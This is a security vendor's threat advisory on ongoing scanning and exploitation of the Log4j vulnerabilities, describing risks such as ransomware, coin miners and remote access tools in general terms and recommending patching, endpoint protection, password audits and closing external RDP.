Cybersecurity Threat Advisory 0001-22: Continued Log4j Scanning Activity
In recent weeks, Microsoft has observed continued attempts by nation-state adversaries and commodity attackers to exploit security vulnerabilities uncovered in the Log4j open-source logging framework. Barracuda MSP’s Security Operation Center (SOC) is also observing scanning activity and exploit attempts for the related vulnerabilities in attempts by threat actors to deploy malware. If you have not done so already, we recommend ensuring your systems are patched with the latest update for Log4j to prevent compromise.
Technical Detail & Additional Information
WHAT IS THE THREAT?
Threat actors are continuing attempts to scan for and exploit the Log4j vulnerability first revealed on December 10th, 2021. Microsoft’s Threat Intelligence Center (MSTIC) released guidance earlier this week stating that “exploitation attempts and testing have remained high during the last weeks of December.” Furthermore, they “observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks.” The remote code execution vulnerability in this framework has emerged as a strong vector for threat actors to get an initial foothold within a network. The subsequent weeks after the initial discovery saw four more weaknesses in the Log4j utility such as CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832. The discovery of these additional vulnerabilities has provided threat actors with persistent control over the compromised assets; and allow them to perform further campaigns such as cryptocurrency mining or ransomware.
WHY IS IT NOTEWORTHY?
This is especially noteworthy due to the prevalence of use of Log4j within applications. While the most notorious affected application is through Apache, millions of other applications also utilize this framework. An unpatched device may lead to a threat actor gaining an initial foothold which they can then use to deploy devastating attacks on a network. Even as scanning attempts are not letting up, threat actors have also been attempting to evade string-matching detections by obfuscating the payloads they use to perform a request to the attacker-controlled site.
WHAT IS THE EXPOSURE OR RISK?
Successful exploit attempts may lead to threat actors deploying ransomware, cryptocurrency miners, or backdoors to networks. Malicious actors may also attempt to maintain persistence in a network in order to exfiltrate sensitive data. This vulnerability has also seen threat actors utilizing this as a vector to drop Meterpreter, Bladabindi (NjRAT) and HabitsRAT remote access toolkits on systems, which may lead to bad actors having complete control over a machine. MSTIC has noted “At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments” and that “Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance.” The U.S Federal Trade Commission (FTC) has also issued a warning that it “intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.” Companies that do not adhere to this warning may face severe legal action for not keeping their systems secure.
WHAT ARE THE RECOMMENDATIONS?
Barracuda MSP recommends the following actions to limit the impact of attempted Log4J exploitations:
- Ensure your systems are up to date if they utilize an application that uses Log4j.
- Deploy SKOUT Endpoint Protection, which can actively block any malware dropped by threat actors once the vulnerability is exploited.
- Utilize a strong password policy and perform account audits regularly to ensure a secure network.
- Ensure services such as RDP are not open externally, which would allow a threat actor to remote into your network with valid credentials.
For more in-depth information about the recommendations, please visit the following links:
If you have any questions, please contact our Security Operations Center.